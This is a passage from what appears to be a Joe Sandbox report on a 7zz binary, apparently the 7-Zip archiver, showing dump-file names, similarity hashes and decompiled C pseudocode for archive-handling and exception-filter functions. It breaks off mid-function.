Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 1c5c9b3bbc459ceaa168d8dbf2743ba381f88a3378da8e3fc4aaaada2f7fab74
Instruction ID: 2873cf6bad21c2a51a49be2c119f9dc910efd3d225da868e7d860f0ff405fddb
Opcode Fuzzy Hash: 1c5c9b3bbc459ceaa168d8dbf2743ba381f88a3378da8e3fc4aaaada2f7fab74
Instruction Fuzzy Hash: 2DC09B74D0420D97CB00E7E5D94E88E77FCE748105F400461D515E3141E670F99587E6

Uniqueness

Uniqueness Score: -1.00%

Function 0046E6AA Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046E6AA() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0046E664); // executed
				 *0x4936e8 = _t1;
				return _t1;
			}

0x0046e6af
0x0046e6b5
0x0046e6ba

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0006E664), ref: 0046E6AF

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c7f1619ac543780bbf34eb8e95484e4113401968d6038d2ffaa388747d46fa77
Instruction ID: a5106b7f6ad9fc50672dff64106b0fe435b0594dc7b9e21cd679f57e89e9b924
Opcode Fuzzy Hash: c7f1619ac543780bbf34eb8e95484e4113401968d6038d2ffaa388747d46fa77
Instruction Fuzzy Hash: 56A012745013009A82105F10A8084083A50A260A037500036500040210D6700494490B

Uniqueness

Uniqueness Score: -1.00%

Function 004264F7 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 904
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004264F7(signed int __ecx, void* __eflags) {
				signed int _t500;
				signed int _t511;
				signed int _t525;
				intOrPtr* _t545;
				signed int _t547;
				signed int _t550;
				signed int _t551;
				signed int _t556;
				signed int _t561;
				signed int _t562;
				intOrPtr* _t573;
				intOrPtr* _t574;
				signed int _t588;
				signed int _t598;
				signed int _t599;
				signed int _t602;
				void* _t611;
				intOrPtr* _t613;
				signed int _t615;
				signed int _t617;
				signed int _t618;
				signed int _t632;
				signed int _t633;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t650;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t669;
				signed int _t683;
				signed int _t684;
				intOrPtr _t686;
				signed int _t687;
				signed char _t689;
				char _t691;
				signed int _t692;
				signed int _t697;
				signed int _t702;
				signed int _t713;
				intOrPtr _t754;
				intOrPtr _t755;
				signed int _t763;
				intOrPtr* _t769;
				char _t792;
				signed int _t805;
				signed int _t835;
				signed int _t854;
				signed int _t874;
				signed int _t876;
				intOrPtr _t878;
				signed int* _t881;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				intOrPtr* _t885;
				intOrPtr* _t886;
				intOrPtr _t888;
				signed int _t889;
				signed int _t890;
				void* _t891;
				intOrPtr* _t892;
				signed int _t893;
				signed int _t894;
				void* _t895;

				E0046B890(E00476819, _t895);
				_t878 =  *((intOrPtr*)(_t895 + 0x18));
				_t874 = __ecx;
				 *(_t895 - 0x14) = __ecx;
				if(E0042CD7D(_t878) == 0) {
					L93:
					_t500 = 0x80004001;
					L144:
					 *[fs:0x0] =  *((intOrPtr*)(_t895 - 0xc));
					return _t500;
				}
				_t713 = 0;
				 *((char*)( *((intOrPtr*)(_t895 + 0x28)))) = 0;
				E00405B9F(_t895 - 0x38);
				 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
				 *(_t895 - 4) = 0;
				 *((intOrPtr*)(_t895 - 0x5c)) = 0;
				E00467C60(_t895 - 0x58);
				 *(_t895 - 4) = 1;
				E0040C9B4(_t895 - 0x5c,  *(_t895 + 8));
				 *(_t895 - 0x10) = 0;
				if( *((intOrPtr*)(_t878 + 0x30)) <= 0) {
					L20:
					 *((intOrPtr*)(_t895 - 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t895 + 0x18)) + 8));
					E004264A2(_t895 - 0x108);
					 *(_t895 - 4) = 4;
					E00427466(_t895 - 0xb8);
					 *(_t895 - 4) = 5;
					E00427107( *((intOrPtr*)(_t895 + 0x18)), _t895 - 0x108);
					if( *_t874 == _t713) {
						L22:
						E0040862D();
						_t511 =  *(_t874 + 0x74);
						_t881 = _t874 + 0x74;
						if(_t511 != _t713) {
							 *((intOrPtr*)( *_t511 + 8))(_t511);
							 *_t881 = _t713;
						}
						if( *((intOrPtr*)(_t874 + 0x68)) != _t713) {
							_push(0x88); // executed
							_t683 = E004079F2(); // executed
							 *(_t895 + 8) = _t683;
							 *(_t895 - 4) = 6;
							if(_t683 == _t713) {
								_t684 = 0;
								__eflags = 0;
							} else {
								_t684 = E0042732B(_t683);
							}
							 *(_t895 - 4) = 5;
							 *((intOrPtr*)(_t874 + 0x6c)) = _t684;
							E0040C9B4(_t881, _t684);
							_t686 =  *((intOrPtr*)(_t874 + 0x6c));
							if(_t686 == _t713) {
								_t687 = 0;
								__eflags = 0;
							} else {
								_t687 = _t686 + 4;
							}
							 *((intOrPtr*)(_t874 + 0x70)) = _t687;
						}
						_t882 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t874 + 0x70))))))(_t895 - 0x108);
						_t916 = _t882 - _t713;
						if(_t882 == _t713) {
							__eflags =  *((intOrPtr*)(_t895 - 0x3c)) - _t713;
							 *(_t895 - 0x18) = _t713;
							if(__eflags <= 0) {
								L51:
								E0042743A(_t874 + 4, __eflags, _t895 - 0x108);
								 *_t874 = 1;
								L52:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t874 + 0x70)))) + 4))();
								__eflags =  *((intOrPtr*)(_t895 - 0x3c)) - _t713;
								 *(_t895 + 0x10) = _t713;
								 *(_t895 - 0x40) = _t713;
								 *(_t895 - 0x1c) = _t713;
								if( *((intOrPtr*)(_t895 - 0x3c)) <= _t713) {
									L135:
									E004241A3(_t895 - 0x108,  *((intOrPtr*)( *((intOrPtr*)(_t895 - 0xc0)))), _t895 - 0x7c, _t895 - 0x120);
									__eflags =  *((intOrPtr*)(_t874 + 0x68)) - _t713;
									if( *((intOrPtr*)(_t874 + 0x68)) != _t713) {
										 *((intOrPtr*)( *((intOrPtr*)(_t874 + 0x6c)) + 0x70)) =  *((intOrPtr*)(_t895 - 0x7c));
									}
									__eflags =  *((intOrPtr*)(_t895 - 0x3c)) - _t713;
									if( *((intOrPtr*)(_t895 - 0x3c)) != _t713) {
										E00404AD0(_t895 - 0x11c, 4);
										 *((intOrPtr*)(_t895 - 0x11c)) = 0x47b1f8;
										 *(_t895 - 4) = 0x2a;
										E0040867E(_t895 - 0x11c,  *((intOrPtr*)(_t895 - 0x30)));
										_t883 = 0;
										__eflags =  *((intOrPtr*)(_t895 - 0x30)) - _t713;
										if( *((intOrPtr*)(_t895 - 0x30)) <= _t713) {
											L142:
											 *((intOrPtr*)(_t895 - 0x78)) =  *((intOrPtr*)(_t895 + 0x1c));
											_t525 =  *(_t874 + 0x74);
											_t884 =  *((intOrPtr*)( *_t525 + 0xc))(_t525,  *((intOrPtr*)(_t895 - 0x110)), _t713,  *((intOrPtr*)(_t895 - 0x30)), _t895 - 0x78, _t713, 1,  *((intOrPtr*)(_t895 + 0x20)));
											 *(_t895 - 4) = 5;
											E00408604(_t895 - 0x11c);
											 *(_t895 - 4) = 1;
											E004272DB(_t895 - 0x108, __eflags);
											 *(_t895 - 4) = _t713;
											E00427310(_t895 - 0x5c);
											_t493 = _t895 - 4;
											 *_t493 =  *(_t895 - 4) | 0xffffffff;
											__eflags =  *_t493;
											E0042434D(_t895 - 0x38);
											L143:
											_t500 = _t884;
											goto L144;
										} else {
											goto L141;
										}
										do {
											L141:
											E00415C6D(_t895 - 0x11c,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t895 - 0x2c)) + _t883 * 4)))));
											_t883 = _t883 + 1;
											__eflags = _t883 -  *((intOrPtr*)(_t895 - 0x30));
										} while (_t883 <  *((intOrPtr*)(_t895 - 0x30)));
										goto L142;
									} else {
										 *(_t895 - 4) = 0x28;
										E00408604(_t895 - 0xb8);
										 *(_t895 - 4) = 1;
										E00423635(_t895 - 0x108, __eflags);
										 *(_t895 - 4) = _t713;
										DeleteCriticalSection(_t895 - 0x58);
										E0043361B(_t895 - 0x5c);
										 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
										 *(_t895 - 4) = 0x29;
										goto L139;
									}
								}
								 *(_t895 - 0x10) = _t713;
								do {
									 *(_t895 + 8) = _t713;
									 *(_t895 - 0x20) =  *( *((intOrPtr*)( *((intOrPtr*)(_t895 + 0x18)) + 0xc)) +  *(_t895 - 0x1c) * 4);
									_t885 =  *((intOrPtr*)( *(_t895 - 0x10) +  *((intOrPtr*)(_t874 + 0x84))));
									_t545 =  *_t885;
									 *(_t895 - 4) = 0x12;
									 *((intOrPtr*)( *_t545))(_t545, 0x47a528, _t895 + 8);
									_t547 =  *(_t895 + 8);
									__eflags = _t547 - _t713;
									if(_t547 == _t713) {
										L58:
										__eflags = _t547 - _t713;
										 *(_t895 - 4) = 5;
										if(_t547 != _t713) {
											 *((intOrPtr*)( *_t547 + 8))(_t547);
										}
										__eflags =  *((intOrPtr*)(_t895 + 0x2c)) - _t713;
										if( *((intOrPtr*)(_t895 + 0x2c)) == _t713) {
											L66:
											 *(_t895 - 0x24) = _t713;
											_t886 =  *_t885;
											 *(_t895 - 4) = 0x1a;
											 *((intOrPtr*)( *_t886))(_t886, 0x47a478, _t895 - 0x24);
											_t550 =  *(_t895 - 0x24);
											__eflags = _t550 - _t713;
											if(_t550 == _t713) {
												L73:
												__eflags = _t550 - _t713;
												 *(_t895 - 4) = 5;
												if(_t550 != _t713) {
													 *((intOrPtr*)( *_t550 + 8))(_t550);
												}
												_t551 =  *(_t895 - 0x20);
												 *(_t895 - 0x10) =  *(_t895 - 0x10) + 4;
												 *(_t895 - 0x14) =  *(_t551 + 0x14);
												 *(_t895 + 8) =  *(_t551 + 0x18);
												E00404AD0(_t895 - 0x90, 4);
												 *((intOrPtr*)(_t895 - 0x90)) = 0x47b1d4;
												 *(_t895 - 4) = 0x24;
												E00404AD0(_t895 - 0xa4, 4);
												 *((intOrPtr*)(_t895 - 0xa4)) = 0x47b1d4;
												 *(_t895 - 4) = 0x25;
												E0040867E(_t895 - 0x90,  *(_t895 - 0x14));
												_t556 = E0040867E(_t895 - 0xa4,  *(_t895 + 8));
												__eflags =  *(_t895 + 8) - _t713;
												if( *(_t895 + 8) <= _t713) {
													_t888 =  *((intOrPtr*)(_t895 + 0x18));
													goto L95;
												} else {
													_t888 =  *((intOrPtr*)(_t895 + 0x18));
													do {
														_t556 = E00415C6D(_t895 - 0xa4,  *(_t888 + 0x48) +  *(_t895 - 0x40) * 8);
														 *(_t895 - 0x40) =  *(_t895 - 0x40) + 1;
														_t251 = _t895 + 8;
														 *_t251 =  *(_t895 + 8) - 1;
														__eflags =  *_t251;
													} while ( *_t251 != 0);
													L95:
													__eflags =  *(_t895 - 0x14) - _t713;
													 *(_t895 - 0x20) = _t713;
													if( *(_t895 - 0x14) <= _t713) {
														goto L112;
													} else {
														goto L96;
													}
													do {
														L96:
														_t754 =  *((intOrPtr*)(_t888 + 0x1c));
														 *(_t895 + 8) = _t713;
														__eflags = _t754 - _t713;
														if(_t754 <= _t713) {
															L100:
															_t561 = _t556 | 0xffffffff;
															__eflags = _t561;
															L101:
															__eflags = _t561 - _t713;
															if(_t561 < _t713) {
																_t755 =  *((intOrPtr*)(_t888 + 0x30));
																 *(_t895 + 8) = _t713;
																__eflags = _t755 - _t713;
																if(_t755 <= _t713) {
																	L108:
																	_t562 = _t561 | 0xffffffff;
																	__eflags = _t562;
																	L109:
																	__eflags = _t562 - _t713;
																	if(_t562 < _t713) {
																		 *(_t895 - 4) = 0x24;
																		E00408604(_t895 - 0xa4);
																		 *(_t895 - 4) = 5;
																		E00408604(_t895 - 0x90);
																		 *(_t895 - 4) = 0x26;
																		E00408604(_t895 - 0xb8);
																		 *(_t895 - 4) = 1;
																		E00423635(_t895 - 0x108, __eflags);
																		 *(_t895 - 4) = _t713;
																		DeleteCriticalSection(_t895 - 0x58);
																		E0043361B(_t895 - 0x5c);
																		 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
																		 *(_t895 - 4) = 0x27;
																		E0040862D();
																		 *(_t895 - 4) =  *(_t895 - 4) | 0xffffffff;
																		E00408604(_t895 - 0x38);
																		_t500 = 0x80004005;
																		goto L144;
																	}
																	_t763 =  *(_t895 + 0x14);
																	goto L111;
																}
																_t574 =  *((intOrPtr*)(_t888 + 0x34));
																while(1) {
																	__eflags =  *_t574 -  *(_t895 + 0x10);
																	if( *_t574 ==  *(_t895 + 0x10)) {
																		break;
																	}
																	 *(_t895 + 8) =  *(_t895 + 8) + 1;
																	_t574 = _t574 + 4;
																	__eflags =  *(_t895 + 8) - _t755;
																	if( *(_t895 + 8) < _t755) {
																		continue;
																	}
																	goto L108;
																}
																_t562 =  *(_t895 + 8);
																goto L109;
															}
															_t562 =  *( *((intOrPtr*)(_t888 + 0x20)) + 4 + _t561 * 8);
															_t763 =  *(_t888 + 0x48);
															goto L111;
														}
														_t573 =  *((intOrPtr*)(_t888 + 0x20));
														while(1) {
															__eflags =  *_t573 -  *(_t895 + 0x10);
															if( *_t573 ==  *(_t895 + 0x10)) {
																break;
															}
															 *(_t895 + 8) =  *(_t895 + 8) + 1;
															_t573 = _t573 + 8;
															__eflags =  *(_t895 + 8) - _t754;
															if( *(_t895 + 8) < _t754) {
																continue;
															}
															goto L100;
														}
														_t561 =  *(_t895 + 8);
														goto L101;
														L111:
														E00415C6D(_t895 - 0x90, _t763 + _t562 * 8);
														 *(_t895 - 0x20) =  *(_t895 - 0x20) + 1;
														 *(_t895 + 0x10) =  *(_t895 + 0x10) + 1;
														_t556 =  *(_t895 - 0x20);
														__eflags = _t556 -  *(_t895 - 0x14);
													} while (_t556 <  *(_t895 - 0x14));
													goto L112;
												}
											}
											_t769 =  *((intOrPtr*)(_t895 + 0x24));
											__eflags = _t769 - _t713;
											if(_t769 == _t713) {
												__eflags = _t550 - _t713;
												 *(_t895 - 4) = 5;
												if(_t550 != _t713) {
													 *((intOrPtr*)( *_t550 + 8))(_t550);
												}
												 *(_t895 - 4) = 0x1b;
												E00408604(_t895 - 0xb8);
												 *(_t895 - 4) = 1;
												E00423635(_t895 - 0x108, __eflags);
												 *(_t895 - 4) = _t713;
												DeleteCriticalSection(_t895 - 0x58);
												E0043361B(_t895 - 0x5c);
												 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
												 *(_t895 - 4) = 0x1c;
												_t884 = 0x80004005;
												L133:
												E0040862D();
												 *(_t895 - 4) =  *(_t895 - 4) | 0xffffffff;
												E00408604(_t895 - 0x38);
												goto L143;
											}
											 *(_t895 - 0x18) = _t713;
											 *(_t895 - 4) = 0x1d;
											_t884 =  *((intOrPtr*)( *_t769 + 0xc))(_t769, _t895 - 0x18);
											__eflags = _t884 - _t713;
											if(_t884 != _t713) {
												__imp__#6( *(_t895 - 0x18));
												_t588 =  *(_t895 - 0x24);
												 *(_t895 - 4) = 5;
												__eflags = _t588 - _t713;
												if(_t588 != _t713) {
													 *((intOrPtr*)( *_t588 + 8))(_t588);
												}
												 *(_t895 - 4) = 0x1e;
												E00408604(_t895 - 0xb8);
												 *(_t895 - 4) = 1;
												E00423635(_t895 - 0x108, __eflags);
												 *(_t895 - 4) = _t713;
												DeleteCriticalSection(_t895 - 0x58);
												E0043361B(_t895 - 0x5c);
												 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
												 *(_t895 - 4) = 0x1f;
												goto L133;
											}
											 *(_t895 - 0x64) = _t713;
											 *(_t895 - 0x60) = _t713;
											 *((intOrPtr*)(_t895 - 0x68)) = 0x47a7ec;
											 *(_t895 - 4) = 0x20;
											 *((char*)( *((intOrPtr*)(_t895 + 0x28)))) = 1;
											E00403532(_t895 - 0x74,  *(_t895 - 0x18));
											 *(_t895 - 4) = 0x21;
											_t891 =  *((intOrPtr*)(_t895 - 0x70)) +  *((intOrPtr*)(_t895 - 0x70));
											E0040FA26(_t895 - 0x68, _t891);
											__eflags =  *((intOrPtr*)(_t895 - 0x70)) - _t713;
											 *(_t895 + 8) = _t713;
											if( *((intOrPtr*)(_t895 - 0x70)) <= _t713) {
												L71:
												_t598 =  *(_t895 - 0x24);
												_t599 =  *((intOrPtr*)( *_t598 + 0xc))(_t598,  *(_t895 - 0x60), _t891);
												_push( *((intOrPtr*)(_t895 - 0x74)));
												_t884 = _t599;
												__eflags = _t884 - _t713;
												if(_t884 != _t713) {
													E00407A18();
													 *((intOrPtr*)(_t895 - 0x68)) = 0x47a7ec;
													E00407A18( *(_t895 - 0x60));
													__imp__#6( *(_t895 - 0x18));
													_t602 =  *(_t895 - 0x24);
													 *(_t895 - 4) = 5;
													__eflags = _t602 - _t713;
													if(_t602 != _t713) {
														 *((intOrPtr*)( *_t602 + 8))(_t602);
													}
													 *(_t895 - 4) = 0x22;
													E00408604(_t895 - 0xb8);
													 *(_t895 - 4) = 1;
													E00423635(_t895 - 0x108, __eflags);
													 *(_t895 - 4) = _t713;
													DeleteCriticalSection(_t895 - 0x58);
													E0043361B(_t895 - 0x5c);
													 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
													 *(_t895 - 4) = 0x23;
													goto L133;
												}
												E00407A18();
												 *((intOrPtr*)(_t895 - 0x68)) = 0x47a7ec;
												E00407A18( *(_t895 - 0x60));
												__imp__#6( *(_t895 - 0x18));
												_t550 =  *(_t895 - 0x24);
												goto L73;
											} else {
												goto L70;
											}
											do {
												L70:
												_t611 =  *(_t895 + 8) +  *(_t895 + 8);
												_t792 =  *((intOrPtr*)(_t611 +  *((intOrPtr*)(_t895 - 0x74))));
												 *((char*)( *(_t895 - 0x60) + _t611)) = _t792;
												 *(_t895 + 8) =  *(_t895 + 8) + 1;
												 *((char*)( *(_t895 - 0x60) + _t611 + 1)) = _t792;
												__eflags =  *(_t895 + 8) -  *((intOrPtr*)(_t895 - 0x70));
											} while ( *(_t895 + 8) <  *((intOrPtr*)(_t895 - 0x70)));
											goto L71;
										} else {
											 *(_t895 + 8) = _t713;
											_t613 =  *_t885;
											 *(_t895 - 4) = 0x17;
											 *((intOrPtr*)( *_t613))(_t613, 0x47a4f8, _t895 + 8);
											_t615 =  *(_t895 + 8);
											__eflags = _t615 - _t713;
											if(_t615 == _t713) {
												L64:
												__eflags = _t615 - _t713;
												 *(_t895 - 4) = 5;
												if(_t615 != _t713) {
													 *((intOrPtr*)( *_t615 + 8))(_t615);
												}
												goto L66;
											}
											_t617 =  *((intOrPtr*)( *_t615 + 0xc))(_t615,  *((intOrPtr*)(_t895 + 0x30)));
											__eflags = _t617 - _t713;
											 *(_t895 - 0x14) = _t617;
											if(_t617 != _t713) {
												_t618 =  *(_t895 + 8);
												 *(_t895 - 4) = 5;
												__eflags = _t618 - _t713;
												if(_t618 != _t713) {
													 *((intOrPtr*)( *_t618 + 8))(_t618);
												}
												 *(_t895 - 4) = 0x18;
												E00408604(_t895 - 0xb8);
												 *(_t895 - 4) = 1;
												E00423635(_t895 - 0x108, __eflags);
												 *(_t895 - 4) = _t713;
												DeleteCriticalSection(_t895 - 0x58);
												E0043361B(_t895 - 0x5c);
												 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
												 *(_t895 - 4) = 0x19;
												E0040862D();
												 *(_t895 - 4) =  *(_t895 - 4) | 0xffffffff;
												E00408604(_t895 - 0x38);
												_t500 =  *(_t895 - 0x14);
												goto L144;
											}
											_t615 =  *(_t895 + 8);
											goto L64;
										}
									}
									_t805 =  *( *(_t895 - 0x20) + 0xc);
									__eflags = _t805 - 0xffffffff;
									 *(_t895 - 0x14) = _t805;
									if(_t805 > 0xffffffff) {
										__eflags = _t547 - _t713;
										 *(_t895 - 4) = 5;
										if(_t547 != _t713) {
											 *((intOrPtr*)( *_t547 + 8))(_t547);
										}
										 *(_t895 - 4) = 0x13;
										E00408604(_t895 - 0xb8);
										 *(_t895 - 4) = 1;
										E00423635(_t895 - 0x108, __eflags);
										 *(_t895 - 4) = _t713;
										DeleteCriticalSection(_t895 - 0x58);
										E0043361B(_t895 - 0x5c);
										 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
										 *(_t895 - 4) = 0x14;
										L89:
										_t884 = 0x80004001;
										goto L133;
									}
									_t632 =  *((intOrPtr*)( *_t547 + 0xc))(_t547,  *((intOrPtr*)( *(_t895 - 0x20) + 0x10)),  *(_t895 - 0x14));
									__eflags = _t632 - _t713;
									 *(_t895 - 0x14) = _t632;
									if(_t632 != _t713) {
										_t633 =  *(_t895 + 8);
										 *(_t895 - 4) = 5;
										__eflags = _t633 - _t713;
										if(_t633 != _t713) {
											 *((intOrPtr*)( *_t633 + 8))(_t633);
										}
										 *(_t895 - 4) = 0x15;
										E00408604(_t895 - 0xb8);
										 *(_t895 - 4) = 1;
										E00423635(_t895 - 0x108, __eflags);
										 *(_t895 - 4) = _t713;
										DeleteCriticalSection(_t895 - 0x58);
										E0043361B(_t895 - 0x5c);
										 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
										_t884 =  *(_t895 - 0x14);
										 *(_t895 - 4) = 0x16;
										goto L133;
									}
									_t547 =  *(_t895 + 8);
									goto L58;
									L112:
									_t889 =  *(_t895 - 0x1c);
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t874 + 0x70)))) + 8))(_t889,  *((intOrPtr*)(_t895 - 0x84)),  *((intOrPtr*)(_t895 - 0x98)));
									 *(_t895 - 4) = 0x24;
									E00408604(_t895 - 0xa4);
									 *(_t895 - 4) = 5;
									E00408604(_t895 - 0x90);
									_t890 = _t889 + 1;
									__eflags = _t890 -  *((intOrPtr*)(_t895 - 0x3c));
									 *(_t895 - 0x1c) = _t890;
								} while (_t890 <  *((intOrPtr*)(_t895 - 0x3c)));
								goto L135;
							} else {
								goto L35;
							}
							while(1) {
								L35:
								_t892 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t895 + 0x18)) + 0xc)) +  *(_t895 - 0x18) * 4));
								 *(_t895 + 0x10) = _t713;
								 *(_t895 + 8) = _t713;
								_push(_t713);
								_push( *((intOrPtr*)(_t892 + 4)));
								 *(_t895 - 4) = 0xa;
								_push( *_t892); // executed
								_t641 = E0040C914(_t895 + 0x10, _t895 + 8, __eflags); // executed
								__eflags = _t641 - _t713;
								 *(_t895 - 0x1c) = _t641;
								if(_t641 != _t713) {
									break;
								}
								 *(_t895 - 0x10) = _t713;
								__eflags =  *((intOrPtr*)(_t892 + 0x14)) - 1;
								 *(_t895 - 4) = 0xd;
								if( *((intOrPtr*)(_t892 + 0x14)) != 1) {
									L41:
									__eflags =  *(_t895 + 8) - _t713;
									if( *(_t895 + 8) == _t713) {
										_t650 =  *(_t895 + 0x10);
										 *(_t895 - 4) = 5;
										__eflags = _t650 - _t713;
										if(_t650 != _t713) {
											 *((intOrPtr*)( *_t650 + 8))(_t650);
										}
										 *(_t895 - 4) = 0x10;
										E00408604(_t895 - 0xb8);
										 *(_t895 - 4) = 1;
										E00423635(_t895 - 0x108, __eflags);
										 *(_t895 - 4) = _t713;
										DeleteCriticalSection(_t895 - 0x58);
										E0043361B(_t895 - 0x5c);
										 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
										 *(_t895 - 4) = 0x11;
										E0040862D();
										_t297 = _t895 - 4;
										 *_t297 =  *(_t895 - 4) | 0xffffffff;
										__eflags =  *_t297;
										E00408604(_t895 - 0x38);
										goto L93;
									}
									E0040C9B4(_t895 - 0x10,  *(_t895 + 8));
									__eflags =  *((intOrPtr*)(_t874 + 0x68)) - _t713;
									if(__eflags != 0) {
										E00423E7F( *((intOrPtr*)(_t874 + 0x6c)), _t895, __eflags,  *(_t895 + 8));
									}
									L44:
									_push(_t895 - 0x10);
									E0042757B(_t874 + 0x78);
									_t661 =  *(_t895 - 0x10);
									 *(_t895 - 4) = 0xa;
									__eflags = _t661 - _t713;
									if(_t661 != _t713) {
										 *((intOrPtr*)( *_t661 + 8))(_t661);
									}
									_t662 =  *(_t895 + 8);
									 *(_t895 - 4) = 9;
									__eflags = _t662 - _t713;
									if(_t662 != _t713) {
										 *((intOrPtr*)( *_t662 + 8))(_t662);
									}
									_t663 =  *(_t895 + 0x10);
									 *(_t895 - 4) = 5;
									__eflags = _t663 - _t713;
									if(_t663 != _t713) {
										 *((intOrPtr*)( *_t663 + 8))(_t663);
									}
									 *(_t895 - 0x18) =  *(_t895 - 0x18) + 1;
									__eflags =  *(_t895 - 0x18) -  *((intOrPtr*)(_t895 - 0x3c));
									if(__eflags < 0) {
										continue;
									} else {
										goto L51;
									}
								}
								__eflags =  *((intOrPtr*)(_t892 + 0x18)) - 1;
								if( *((intOrPtr*)(_t892 + 0x18)) != 1) {
									goto L41;
								}
								_t835 =  *(_t895 + 0x10);
								__eflags = _t835 - _t713;
								if(_t835 == _t713) {
									_t669 =  *(_t895 + 8);
									 *(_t895 - 4) = 9;
									__eflags = _t669 - _t713;
									if(_t669 != _t713) {
										 *((intOrPtr*)( *_t669 + 8))(_t669);
										_t835 =  *(_t895 + 0x10);
									}
									__eflags = _t835 - _t713;
									 *(_t895 - 4) = 5;
									if(_t835 != _t713) {
										 *((intOrPtr*)( *_t835 + 8))(_t835);
									}
									 *(_t895 - 4) = 0xe;
									E00408604(_t895 - 0xb8);
									 *(_t895 - 4) = 1;
									E00423635(_t895 - 0x108, __eflags);
									 *(_t895 - 4) = _t713;
									DeleteCriticalSection(_t895 - 0x58);
									E0043361B(_t895 - 0x5c);
									 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
									 *(_t895 - 4) = 0xf;
									goto L89;
								}
								E0040C9B4(_t895 - 0x10, _t835);
								__eflags =  *((intOrPtr*)(_t874 + 0x68)) - _t713;
								if(__eflags != 0) {
									E00423E5A( *((intOrPtr*)(_t874 + 0x6c)), _t895, __eflags,  *(_t895 + 0x10));
								}
								goto L44;
							}
							_t642 =  *(_t895 + 8);
							 *(_t895 - 4) = 9;
							__eflags = _t642 - _t713;
							if(_t642 != _t713) {
								 *((intOrPtr*)( *_t642 + 8))(_t642);
							}
							_t643 =  *(_t895 + 0x10);
							 *(_t895 - 4) = 5;
							__eflags = _t643 - _t713;
							if(_t643 != _t713) {
								 *((intOrPtr*)( *_t643 + 8))(_t643);
							}
							 *(_t895 - 4) = 0xb;
							E00408604(_t895 - 0xb8);
							 *(_t895 - 4) = 1;
							E00423635(_t895 - 0x108, __eflags);
							 *(_t895 - 4) = _t713;
							DeleteCriticalSection(_t895 - 0x58);
							E0043361B(_t895 - 0x5c);
							 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
							_t884 =  *(_t895 - 0x1c);
							 *(_t895 - 4) = 0xc;
							goto L133;
						} else {
							 *(_t895 - 4) = 7;
							E00408604(_t895 - 0xb8);
							 *(_t895 - 4) = 1;
							E00423635(_t895 - 0x108, _t916);
							 *(_t895 - 4) = _t713;
							DeleteCriticalSection(_t895 - 0x58);
							E0043361B(_t895 - 0x5c);
							 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
							 *(_t895 - 4) = 8;
							_t713 = _t882;
							L139:
							E0040862D();
							 *(_t895 - 4) =  *(_t895 - 4) | 0xffffffff;
							E00408604(_t895 - 0x38);
							_t500 = _t713;
							goto L144;
						}
					}
					_t689 = E0042721E(_t895 - 0x108, _t874 + 4);
					asm("sbb al, al");
					_t691 =  ~_t689 + 1;
					 *((char*)(_t895 + 0xb)) = _t691;
					if(_t691 == 0) {
						goto L52;
					}
					goto L22;
				} else {
					_t893 =  *(_t895 + 0x14);
					 *(_t895 + 8) = _t893;
					L4:
					_push(0x18);
					_t692 = E004079F2();
					if(_t692 == _t713) {
						_t876 = 0;
						__eflags = 0;
					} else {
						 *(_t692 + 4) = _t713;
						 *_t692 = 0x47b228;
						_t876 = _t692;
					}
					 *(_t895 - 0x40) = _t876;
					if(_t876 != _t713) {
						 *((intOrPtr*)( *_t876 + 4))(_t876);
					}
					_push(0x28);
					 *((intOrPtr*)(_t876 + 8)) = _t895 - 0x5c;
					 *((intOrPtr*)(_t876 + 0x10)) =  *((intOrPtr*)(_t895 + 0xc));
					 *(_t876 + 0x14) =  *(_t895 + 0x10);
